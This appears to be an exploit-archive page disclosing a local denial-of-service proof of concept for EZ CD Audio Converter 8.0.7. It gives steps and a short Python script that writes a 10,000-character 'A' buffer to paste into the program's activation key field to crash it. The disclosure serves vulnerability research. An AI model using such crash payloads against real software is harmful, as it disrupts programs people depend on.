EZ CD Audio Converter 8.0.7 Denial of Service

2019.01.09

Credit: Achilles

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)
# Date: 2018-12-30
# Exploit Author: Achilles
# Vendor Homepage: https://www.poikosoft.com/
# Software Link : https://download.poikosoft.com/ez_cd_audio_converter_setup_x64.exe
# Exploit Author: Achilles
# Tested Version: 8.0.7 (64-bit)
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:=20
# 1.- Run python code : EZ_CD_Audio_Converter.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open EZ_CD_Audio_Converter 'Press Activate'
# 4.- Paste the content of EVIL.txt into the field: 'Key'
# 5.- And you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 10000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

EZ CD Audio Converter 8.0.7 Denial of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.